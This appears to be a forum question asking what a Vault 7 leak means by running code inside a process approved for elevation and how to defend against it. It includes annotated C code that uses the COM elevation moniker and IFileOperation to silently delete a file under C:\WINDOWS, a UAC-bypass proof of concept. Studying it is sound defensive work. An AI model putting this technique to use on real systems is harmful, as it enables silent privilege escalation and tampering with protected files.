The Vault 7 leaks say you can escalate privilege by running code "within the context of a process approved for elevation", giving explorer.exe and notepad as examples.
I'm new to Windows internals. What does that mean, and how do I protect against it? Are they shipping tampered binaries, or are they getting a legitimate process such as notepad to execute their code? The link and the code in question are below:
https://wikileaks.org/ciav7p1/cms/page_3375231.html
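// Instantiate a COM class through the elevation moniker
// ("Elevation:Administrator!new:{CLSID}") so that the out-of-process server
// is started with administrator rights rather than the caller's token.
//
// hwnd   - owner window handed to COM for any consent UI it decides to show
//          (NULL is accepted, see the caller below).
// rclsid - class to instantiate.
// riid   - interface requested on the new object.
// ppv    - receives the interface pointer; only valid when the returned
//          HRESULT succeeds.
//
// NOTE(review): whether this call elevates silently or raises a UAC consent
// prompt is decided by COM from the identity of the *calling process* and
// the requested class, not by anything in this function. The leaked text
// quoted above says the code has to run "within the context of a process
// approved for elevation" (explorer.exe is its example) — i.e. the attacker
// first gets code into such a process and only then issues this call.
// Any call site of this helper is therefore a privilege boundary.
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv)
{
    // StringFromGUID2 needs 39 WCHARs ("{...}" plus NUL); 50 leaves slack.
    // It returns 0 when the buffer is too small, which the original code
    // ignored and then formatted an uninitialised buffer into the moniker.
    WCHAR wszCLSID[50];
    if (StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID) / sizeof(wszCLSID[0])) == 0)
        return E_FAIL;

    // Build the elevation moniker display name for the requested class.
    WCHAR wszMon[300];
    HRESULT hr = StringCchPrintfW(wszMon, sizeof(wszMon) / sizeof(wszMon[0]),
                                  L"Elevation:Administrator!new:%s", wszCLSID);
    if (FAILED(hr))
        return hr;

    // BIND_OPTS3 carries the owner window and the class context; the
    // elevation moniker requires an out-of-process (LOCAL_SERVER) activation.
    BIND_OPTS3 bo;
    memset(&bo, 0, sizeof(bo));
    bo.cbStruct = sizeof(bo);
    bo.hwnd = hwnd;
    bo.dwClassContext = CLSCTX_LOCAL_SERVER;

    return CoGetObject(wszMon, &bo, riid, ppv);
}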
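// Proof-of-concept for the leaked note: obtain IFileOperation through the
// elevation moniker (CoCreateInstanceAsAdmin above) and delete a file under
// C:\WINDOWS, a location a standard-user token cannot write to. If the
// delete goes through, the calling process obtained an elevated COM server.
//
// The original version dereferenced pfo and item without checking the
// HRESULTs that produce them, so any activation failure (e.g. the moniker
// being refused for this process) was a null-pointer crash rather than a
// clean return. Every out-pointer is now checked before use and COM is only
// uninitialised when it was initialised.
//
// Requires Vista or later (IFileOperation and the elevation moniker).
void ElevatedDelete()
{
    MessageBox(NULL, "DELETING", "TESTING", MB_OK);

    HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
    if (FAILED(hr))
        return;  // no apartment was entered, so there is nothing to uninitialise

    IFileOperation *pfo = NULL;
    hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo));
    if (SUCCEEDED(hr))
    {
        // FOF_NO_UI: no progress dialog, no confirmation and no error box —
        // the user sees nothing; failures surface only through HRESULTs.
        pfo->SetOperationFlags(FOF_NO_UI);

        IShellItem *item = NULL;
        hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item));
        if (SUCCEEDED(hr))
        {
            // DeleteItem only queues the operation; PerformOperations runs it.
            if (SUCCEEDED(pfo->DeleteItem(item, NULL)))
                pfo->PerformOperations();
            item->Release();
        }
        pfo->Release();
    }

    CoUninitialize();
}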